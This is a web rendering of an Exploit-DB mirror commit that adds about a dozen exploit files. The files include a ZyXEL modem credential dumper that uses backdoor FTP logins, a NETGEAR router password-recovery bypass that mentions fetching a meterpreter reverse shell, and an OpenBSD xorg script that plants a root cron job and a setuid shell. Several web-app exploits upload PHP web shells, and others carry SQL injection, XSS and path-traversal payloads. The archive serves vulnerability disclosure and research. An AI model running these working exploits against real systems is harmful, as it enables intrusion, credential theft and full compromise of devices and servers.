bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-10-31

Browse source 
22 changes to exploits/shellcodes

ZyXEL VMG3312-B10B < 1.00(AAPP.7) - Credential Disclosure
QNAP NetBak Replicator 4.5.6.0607 - Denial of Service (PoC)
SIPp 3.3.990 - Local Buffer Overflow (PoC)
R 3.4.4 (Windows 10 x64) - Buffer Overflow (DEP/ASLR Bypass)
xorg-x11-server 1.20.3 - Privilege Escalation
Any Sound Recorder 2.93 - Buffer Overflow Local (SEH) (Metasploit)

Nutanix AOS & Prism < 5.5.5 (LTS) / < 5.8.1 (STS) - SFTP Authentication Bypass
South Gate Inn Online Reservation System 1.0 - 'q' SQL Injection
Electricks eCommerce 1.0 - 'prodid' SQL Injection
phptpoint Pharmacy Management System 1.0 - 'username' SQL Injection
Webiness Inventory 2.9 - Arbitrary File Upload
NETGEAR WiFi Router R6120 - Credential Disclosure
MyBB Downloads 2.0.3 - SQL Injection
Expense Management 1.0 - Arbitrary File Upload
University Application System 1.0 - SQL Injection / Cross-Site Request Forgery (Add Admin)
Notes Manager 1.0 - Arbitrary File Upload
Instagram Clone 1.0 - Arbitrary File Upload
Microstrategy Web 7 - Cross-Site Scripting / Directory Traversal
Asaancart Simple PHP Shopping Cart 0.9 - Arbitrary File Upload / SQL Injection
CI User Login and Management 1.0 - Arbitrary File Upload

Windows/x64 - Remote (Bind TCP) Keylogger Shellcode (864 bytes) (Generator)
This commit is contained in:
Offensive Security 2018-10-31 05:01:53 +00:00
parent 30d2891e07
commit ef70ec156b
24 changed files with 2778 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

35
exploits/hardware/dos/45746.php Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: ZyXEL VMG3312-B10B - Leak Credentials < 1.00(AAPP.7)
# Date: 2018-10-28
# Exploit Author: numan türle @numanturle
# Vendor Homepage: https://www.zyxel.com/
# Software Link: ftp://ftp.zyxel.com.tr/ZyXEL_URUNLERI/MODEMLER/VDSL_MODEMLER/VMG3312-B10B/
# Firmware: 1.00(AAPP.0)D7
# Tested on: windows
# Fixed firmware: 1.00(AAPP.7)
<?php
$ftp_server = "192.168.1.1"; // modem ip address
$ftp_conn = ftp_connect($ftp_server) or die("ftp server close");
$login = ftp_login($ftp_conn, "support", "support"); // backdoor
$local_file = "crackme";
$server_file = "/var/csamu"; // base64_encode files
if (ftp_get($ftp_conn, $local_file, $server_file, FTP_BINARY)) {
$open = file($local_file);
foreach($open as $u_p){
$bomb = explode(" ",$u_p);
$user = $bomb[0];
$pass = base64_decode($bomb[1]);
if(!empty($pass)){
echo "{$user}:{$pass}<br>";
}else {
continue;
}
}
}else {
echo "pfff";
}
ftp_close($ftp_conn);
?>

34
exploits/hardware/webapps/45741.txt Normal file
View file

@ -0,0 +1,34 @@
# Exploit Title: NETGEAR WiFi Router R6120 - Credential Disclosure
# Date: 2018-10-28
# Exploit Author: Wadeek
# Hardware Version: R6120
# Firmware Version: 1.0.0.30
# Vendor Homepage: https://www.netgear.com/support/product/R6120.aspx
# Firmware Link: http://www.downloads.netgear.com/files/GDC/R6120/R6120-V1.0.0.30.zip
# == Files Containing Juicy Info ==
>> http://192.168.1.1:56688/rootDesc.xml (Server: Unspecified, UPnP/1.0, Unspecified)
<serialNumber>SSSSSSSNNNNNN</serialNumber>
# == Security Questions Bypass > Password Disclosure ==
>> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input)
<POST REQUEST>
htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm)
(replace)
dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID=
(by)
dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=passwordrecovered.htm&SID=
<POST RESPONSE>
">You have successfully recovered the admin password.</span>
">Router Admin Username</span>:&nbsp;admin</td>
">Router Admin Password</span>:&nbsp;Str0ng+-Passw0rd</td>
# == Authenticated Telnet Command Execution ==
>> http://admin:Str0ng+-Passw0rd@192.168.1.1/setup.cgi?todo=debug
:~$ telnet 192.168.1.1
R6120 login: admin
Password: Str0ng+-Passw0rd
{
upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT]
download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT]
}

93
exploits/jsp/webapps/45755.txt Normal file
View file

@ -0,0 +1,93 @@
<!--
# Exploit Title: Path traversal vulnerability in Microstrategy Web version 7
# Date: 29-10-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.microstrategy.com
# Software Link: https://www.microstrategy.com
# Version: Microstrategy Web version 7
# Tested on: all
# CVE : CVE-2018-18777
# Category: webapps
1. Description
Directory traversal vulnerability in Microstrategy Web, version 7, in
"/WebMstr7/servlet/mstrWeb" (in the parameter subpage) allows remote
authenticated users to bypass intended SecurityManager restrictions and
list a parent directory via a /.. (slash dot dot) in a pathname used by a
web application.
2. Proof of Concept
http://X.X.X.X/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=../../../../../../../../etc/passwd
3. Solution:
The product is discontinued. Update to last version this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in Microstrategy Web version 7
# Date: 29-10-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.microstrategy.com
# Software Link: https://www.microstrategy.com
# Version: Microstrategy Web version 7
# Tested on: Unix
# CVE : CVE-2018-18775
# Category: webapps
1. Description
Microstrategy Web, version 7, does not sufficiently encode user-controlled
inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the
Login.asp Msg parameter.
2. Proof of Concept
http://X.X.X.X/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=
"><script>alert("XSS");</script><"
3. Solution:
The product is discontinued. Update to last version this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in Microstrategy Web version 7
# Date: 29-10-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.microstrategy.com
# Software Link: https://www.microstrategy.com
# Version: Microstrategy Web version 7
# Tested on: all
# CVE : CVE-2018-18776
# Category: webapps
1. Description
Microstrategy Web, version 7, does not sufficiently encode user-controlled
inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the
admin.asp ShowAll parameter.
2. Proof of Concept
http://X.X.X.X/microstrategy7/admin/admin.asp?ShowAll=
"><script>alert("XSS")</script><"&ShowAllServers=show
3. Solution:
The product is discontinued. Update to last version this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->

23
exploits/linux/dos/45750.txt Normal file
View file

@ -0,0 +1,23 @@
# Exploit Title: SIPp 3.3.990 - Local Buffer Overflow (PoC)
# Date: 2018-10-29
# Exploit Author: Nawaf Alkeraithe
# Vendor Homepage: http://sipp.sourceforge.net/
# Software Link:
https://sourceforge.net/projects/sipp/files/sipp/3.4/sipp-3.3.990.tar.gz/download
<https://github.com/SIPp/sipp/releases>
# Version: SIPp v3.4-beta1 (aka v3.3.990)-SCTP-PCAP built Oct 29 2018
# Tested on: 3.3.990
$ ./sipp -trace_logs $(python -c 'print "A"*300')
$ ./sipp -message_file $(python -c 'print "A"*300')
$ ./sipp -calldebug_file $(python -c 'print "A"*300')
$ ./sipp -trace_err $(python -c 'print "A"*300')

31
exploits/multiple/remote/45748.py Executable file
View file

@ -0,0 +1,31 @@
# Exploit Title: Nutanix AOS & Prism - SFTP Authentication Bypass
# Date: 2018-10-27
# Exploit Author: Adam Brown
# Vendor Homepage: https://www.nutanix.org
# Software Link: https://www.nutanix.com/products/software-options/
# Version: < 5.5.5 (LTS), < 5.8.1 (STS)
# Tested on: Acropolis Operating System
# CVE : Related to CVE-2018-7750
#
# This PoC is based on discussions found at the following blog post:
# https://coffeegist.com/security/paramiko-ssh-authentication-bypass-in-nutanix/
# TLDR, the Acropolis SFTP server doesn't check if the client has completed the
# authentication step before allowing the client to open channels. The PoC below
# connects to the acropolis SFTP server, and lists the root directory without
# authenticating.
#!/usr/bin/python
import paramiko
host = '127.0.0.1'
port = 2222
trans = paramiko.Transport((host, port))
trans.start_client()
# If the call below is skipped, no username or password is required.
# trans.auth_password('username', 'password')
sftp = paramiko.SFTPClient.from_transport(trans)
print(sftp.listdir('/'))
sftp.close()

76
exploits/openbsd/local/45742.sh Executable file
View file

@ -0,0 +1,76 @@
# Exploit Title: xorg-x11-server 1.20.3 - Privilege Escalation
# Date: 2018-10-27
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.x.org/
# Version: xorg-x11-server 1.19.0 - 1.20.2
# Tested on: OpenBSD 6.3 and 6.4
# CVE : CVE-2018-14665
# raptor_xorgasm
#!/bin/sh
#
# raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron
# Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission
# check for -modulepath and -logfile options when starting Xorg. X server
# allows unprivileged users with the ability to log in to the system via
# physical console to escalate their privileges and run arbitrary code under
# root privileges (CVE-2018-14665).
#
# This exploit targets OpenBSD's cron in order to escalate privileges to
# root on OpenBSD 6.3 and 6.4. You don't need to be connected to a physical
# console, it works perfectly on pseudo-terminals connected via SSH as well.
#
# See also:
# https://lists.x.org/archives/xorg-announce/2018-October/002927.html
# https://www.exploit-db.com/exploits/45697/
# https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850
#
# Usage:
# blobfish$ chmod +x raptor_xorgasm
# blobfish$ ./raptor_xorgasm
# [...]
# Be patient for a couple of minutes...
# [...]
# Don't forget to cleanup and run crontab -e to reload the crontab.
# -rw-r--r-- 1 root wheel 47327 Oct 27 14:48 /etc/crontab
# -rwsrwxrwx 1 root wheel 7417 Oct 27 14:50 /usr/local/bin/pwned
# blobfish# id
# uid=0(root) gid=0(wheel) groups=1000(raptor), 0(wheel)
#
# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):
# OpenBSD 6.4 (Xorg 1.19.6) [tested]
# OpenBSD 6.3 (Xorg 1.19.6) [tested]
#
echo "raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron"
echo "Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>"
# prepare the payload
cat << EOF > /tmp/xorgasm
cp /bin/sh /usr/local/bin/pwned # fallback in case gcc is not available
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gcc /tmp/pwned.c -o /usr/local/bin/pwned # most dirs are mounted nosuid
chmod 4777 /usr/local/bin/pwned
EOF
chmod +x /tmp/xorgasm
# trigger the bug
cd /etc
Xorg -fp "* * * * * root /tmp/xorgasm" -logfile crontab :1 &
sleep 5
pkill Xorg
# run the setuid shell
echo
echo "Be patient for a couple of minutes..."
echo
sleep 120
echo
echo "Don't forget to cleanup and run crontab -e to reload the crontab."
ls -l /etc/crontab*
ls -l /usr/local/bin/pwned
/usr/local/bin/pwned

283
exploits/php/webapps/45584.txt
View file

@ -14,4 +14,285 @@
<?php $cmd=$_GET['cmd']; system($cmd);?>
# Exploit Code:
$ curl -F "files=@shell.php" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php
$ curl -F "files=@shell.php" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php
#!/bin/bash
USERAGENT="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
PATHS=("server/php/upload.class.php" "example/upload.php" "server/php/UploadHandler.php" "php/index.php")
MALICIOUS_FILE="$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 12 | head -n 1).php"
# What is added in this exploit from the original version
# - a bit of refactoring
# - automatically request the right filename if it already exists on server ex: 'file (1).php'
# - Try to detect plugin version,
# - Try to detect index.html (allowing files upload via gui)
# Checking curl & jq
curl -h &>/dev/null
if [ $? -ne 0 ]; then
echo "[!] Please install curl."
echo "# apt install curl"
exit 1
fi
jq -h &>/dev/null
if [ $? -ne 0 ]; then
echo "[!] Please install jq."
echo "# apt install jq"
exit 1
fi
# Checking url
if [ -z $1 ]; then
echo "[!] Please supply a target host as an argument."
echo "$0 http://www.example.com"
exit 1
fi
# Generating payload
echo "<?php echo \"it works\"; unlink(__FILE__); ?>" > ${MALICIOUS_FILE}
echo "________________________________________________________________________________"
echo "|PoC Exploit for Blueimp's jQuery File Uploader CVE-2018-9206"
echo "|Checks for older versions of the code and upload an harmless file."
echo "|"
echo "| @_larry0, @phackt_ul"
echo "|Works for version <= 9.22.0 and with Apache > 2.3.9 (AllowOverride None)."
echo "---/"
echo
echo "[+] Checking variations :"
# Creating alias
curl='curl --connect-timeout 10 -sk -A "${USERAGENT}"'
index=-1
found=0
# Looking for upload php class file
for x in ${PATHS[@]}; do
echo "[*] Testing... -> $1/$x"
${curl} -i "$1/$x" | head -1 | grep 200 &>/dev/null
if [ $? -eq 0 ]; then
echo "[+] Found Path: $x"
index=$((${index}+1))
found=1
break;
fi;
index=$((${index}+1))
done
# Determining the exploit path according to the jquery version
exploit_path=""
if [ ${index} -eq 0 -o ${index} -eq 2 ];then
exploit_path="server/php/index.php"
fi
if [ ${index} -eq 1 ];then
exploit_path="example/upload.php"
fi
if [ ${index} -eq 3 ];then
exploit_path="php/index.php"
fi
if [ ${found} -ne 1 ]; then
echo "[!] ### Error: A vulnerable jQuery-File-Upload plugin was not found!"
exit 1
fi
# Trying to detect bower.json, package.json
version_files=("bower.json package.json")
for x in ${version_files[@]}; do
version=`${curl} "$1/$x" | jq -r .version`
if [ "X" != "X""${version}" ]; then
echo "[!] Found: Plugin version ${version}"
break;
fi
done
# Trying to detect index.html
${curl} "$1/index.html" | grep -i "jquery file upload" &>/dev/null
if [ $? -eq 0 ]; then
echo "[!] Found: $1/index.html is accessible"
fi
# Uploading payload
res=""
echo "[+] Running ${curl} -F \"files[]=@${MALICIOUS_FILE}\" -F \"filename=${MALICIOUS_FILE}\" \"$1/${exploit_path}\""
filename=`${curl} -F "files[]=@${MALICIOUS_FILE}" -F "filename=${MALICIOUS_FILE}" "$1/${exploit_path}" | jq -r .files[].name`
if [ "X""${filename}" == "X" ]; then
echo "[!] It seems that we had a false positive! :("
exit 1
fi
filename=`echo "$filename" | sed 's/ /%20/g'`
# Trying to see if victim has been exploited
echo "[+] Testing path: $1/$(dirname ${exploit_path})/files/${filename}"
res=`${curl} "$1/$(dirname ${exploit_path})/files/${filename}"`
if [ "${res}" == "it works" ]; then
echo "[!] Found: $1 is vulnerable"
else
echo "[+] Seems not vulnerable :("
fi
rm -f "${MALICIOUS_FILE}" &>/dev/null

61
exploits/php/webapps/45736.txt Normal file
View file

@ -0,0 +1,61 @@
# Exploit Title: South Gate Inn Online Reservation System 1.0 - 'q' SQL Injection
# Dork: N/A
# Date: 2018-10-29
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/southgateinn_0.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/admin/mod_users/controller.php?action=edit
#
POST /[PATH]/admin/mod_users/controller.php?action=edit HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 104
USERID=1&UNAME=Anonymous&USERNAME=efe&deptid=&UPASS=efe&ROLE=Administrator&deptid=&PHONE=912856478&save=
HTTP/1.1 200 OK
Date: Mon, 29 Oct 2018 14:20:22 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 57
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/index.php?p=accomodation&q=[SQL]
#
GET /[PATH]/index.php?p=accomodation&q=-Standard%20Room%27%20%20UNION%20SELECT%201,2,3,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),5,6,7,8,9,10,11--%20- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1
Connection: keep-alive
HTTP/1.1 200 OK
Date: Mon, 29 Oct 2018 14:23:59 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

77
exploits/php/webapps/45737.txt Normal file
View file

@ -0,0 +1,77 @@
# Exploit Title: Electricks eCommerce 1.0 - 'prodid' SQL Injection
# Dork: N/A
# Date: 2018-10-29
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/users/billyblue
# Software Link: https://www.sourcecodester.com/sites/default/files/download/_billyblue/electricks.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index_search.php
#
#[PATH]/index_search.php
#....
#139 if (isset($_POST['search'])){
#140
#141 $search=$_POST['search'];
#142
#143 $query="SELECT * FROM products WHERE category LIKE '%$search%' OR prod_name LIKE '%$search%' OR prod_desc LIKE '%$search%'";
#144 $result = mysqli_query($dbconn,$query);
#145 while($res=mysqli_fetch_array($result)){
#146 $prod_id=$res['prod_id'];
#....
POST /[PATH]/index_search.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 265
search=12'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'
HTTP/1.1 200 OK
Date: Mon, 29 Oct 2018 14:51:00 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/pages/product_details.php?prod_id=[SQL]
#
#[PATH]/pages/product_details.php
#....
#49 include('../config/dbconn.php');
#50 $prod_id=$_GET['prod_id'];
#51 $query = "SELECT * FROM products WHERE prod_id='$prod_id'";
#52 $result = mysqli_query($dbconn,$query);
#53 while($res = mysqli_fetch_array($result)) {
#....
GET /[PATH]/pages/product_details.php?prod_id=%2d%31%32%27%20%20%55%4e%49%4f%4e%28%53%45%4c%45%43%54%28%31%29%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%74%61%62%6c%65%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%54%41%42%4c%45%5f%53%43%48%45%4d%41%3d%44%41%54%41%42%41%53%45%28%29%29%2c%28%33%29%2c%28%34%29%2c%28%35%29%2c%28%36%29%2c%28%37%29%2c%28%38%29%2c%28%39%29%2c%28%31%30%29%2c%28%31%31%29%2c%28%31%32%29%29%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1
Connection: keep-alive
HTTP/1.1 200 OK
Date: Mon, 29 Oct 2018 14:55:09 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7673
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

46
exploits/php/webapps/45739.txt Normal file
View file

@ -0,0 +1,46 @@
# Exploit Title: phptpoint Pharmacy Management System 1.0 - 'username' SQL injection
# Date: 2018-10-24
# Exploit Author: Boumediene KADDOUR
# Unit: Algerie Telecom R&D Unit
# Vendor Homepage: https://www.phptpoint.com/
# Software Link: https://www.phptpoint.com/pharmacy-management-system/
# Version: 1
# Tested on: WAMP windows 10 x64
# CVE: unknown
# Description:
# phptpoint Pharmacy Management System SQL injection suffers from a SQL
# injection vulnerability that allows an attacker to bypass the login page
# and authenticate as admin or any other user.
# Vulnerable Code:
# 4 $username=$_POST['username'];
# 5 $password=$_POST['password'];
# 6 $position=$_POST['position'];
# 7 switch($position){
# 8 case 'Admin':
# 9 $result=mysql_query("SELECT admin_id, username FROM admin WHERE
# username='$username' AND password='$password'");
# 10 $row=mysql_fetch_array($result);
# Payload:
POST /Pharmacy/index.php HTTP/1.1
Host: 172.16.122.4
Content-Length: 80
Cache-Control: max-age=0
Origin: http://172.16.122.4
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://172.16.122.4/Pharmacy/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,fr;q=0.8,fr-FR;q=0.7
Cookie: PHPSESSID=2kn5jlcarggk5u3bl1crarrj85
Connection: close
username=admin%27+OR+1+--+&password=anyPassword&position=Admin&submit=Login

120
exploits/php/webapps/45740.txt Normal file
View file

@ -0,0 +1,120 @@
# Exploit Title: Webiness Inventory 2.9 - Arbitrary File Upload
# Date: 2018-10-27
# Exploit Author: Boumediene KADDOUR
# Unit: Algerie Telecom R&D Unit
# Software Link: https://github.com/webiness/webiness_inventory
# Version: 2.9<
# Tested on: WAMP windows 10 x64
# CVE: unknown
# Vulnerable Code: https://github.com/webiness/webiness_inventory/blob/master/protected/library/ajax/WsSaveToModel.php
46 foreach ($_FILES as $file) {
47 $fileName = $file['name'];
48 $fileTmp = $file['tmp_name'];
49 $destDir = WsROOT.'/runtime/'.$model;
50
51 $field = key($_FILES);
52
53 // files are upload to "runtime" directory create destination directory
54 // if not exist
55 if (!file_exists($destDir)) {
56 mkdir($destDir, 0777, true);
57 }
58
59 // allowed file size is 3MB
60 if ($file['size'] > 3145728) {
61 continue;
62 }
63
64 // remove old file with same name
65 if (file_exists($destDir.'/'.$fileName)) {
66 unlink($destDir.'/'.$fileName);
67 }
68
69 // upload file
70 move_uploaded_file($fileTmp, $destDir.'/'.$fileName);
71 $m->$field= $fileName;
72 }
# Proof Of Concept
POST /webiness_inventory-2.3/protected/library/ajax/WsSaveToModel.php HTTP/1.1
Host: 172.16.122.4
Content-Length: 1838
Accept: */*
Origin: http://172.16.122.4
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUOOyIF2f26nDrsM7
Referer: http://172.16.122.4/webiness_inventory-2.3/index.php?request=partners/index/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,fr;q=0.8,fr-FR;q=0.7
Cookie: resolve_ids=0; order_dir_list_by=1A; _csrf=b49cff27d7c0ccd3a8dd5af3813025249dc909f2a20c12efcb7770f945715b06a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%224dWxR4kKmI-ZSWJBsigl0tHhdecVhozc%22%3B%7D; language=32d49278f28c78229de164fe79dc13b6adb3c98af2d133240eb1ffc44771ad3da%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22language%22%3Bi%3A1%3Bs%3A2%3A%22en%22%3B%7D; PHPSESSID=h66id6epvp8g1uoshrdog53323
Connection: close
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="model_name"
PartnerModel
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="id"
2
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="partner_name"
My crucial Partner
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="logo"; filename="shell.php"
Content-Type: application/octet-stream
<?php system($_GET['cmd']);?>
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="id_number"
25
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="tax_number"
225588664477
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="iban"
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="address1"
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="address2"
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="region_state"
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="zip"
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="city"
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="country"
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="email"
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="web"
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name="phone_number"
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name=""
------WebKitFormBoundaryUOOyIF2f26nDrsM7
Content-Disposition: form-data; name=""
------WebKitFormBoundaryUOOyIF2f26nDrsM7--
# Access your webshell via the below link
http://172.16.122.4/webiness_inventory-2.3/runtime/PartnerModel/shell.php?cmd=whoami

86
exploits/php/webapps/45747.txt Normal file
View file

@ -0,0 +1,86 @@
# Exploit Title: MyBB Downloads 2.0.3 - SQL Injection
# Date: 28-10-2018
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Webiste: https://nitesculucian.github.io
# Vendor Homepage: https://github.com/vintagedaddyo/MyBB_Plugin-Downloads
# Software Link: https://github.com/vintagedaddyo/MyBB_Plugin-Downloads
# Version: 2.0.3
# Tested on: Ubuntu 18.04
1. Description:
It is a plugin which adds a page to download files. If enabled, regular members can add new downloads to the page after admin approval.
2. Proof of Concept:
Persistent XSS
- Go to downloads.php page
- Create a New Download
- Add the following to the title: a"
- Now on submit, the user will be prompted to an SQL Injection specific error.
```
MyBB has experienced an internal SQL error and cannot continue.
SQL Error:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"a""' at line 1
Query:
SELECT * FROM mybb_downloads WHERE name="a""
```
- THis can be exploited with: sqlmap -r request_file -p name --threads 5
3. Request File example:
POST /downloads.php?newdownload=1 HTTP/1.1
Host: localhost:8081
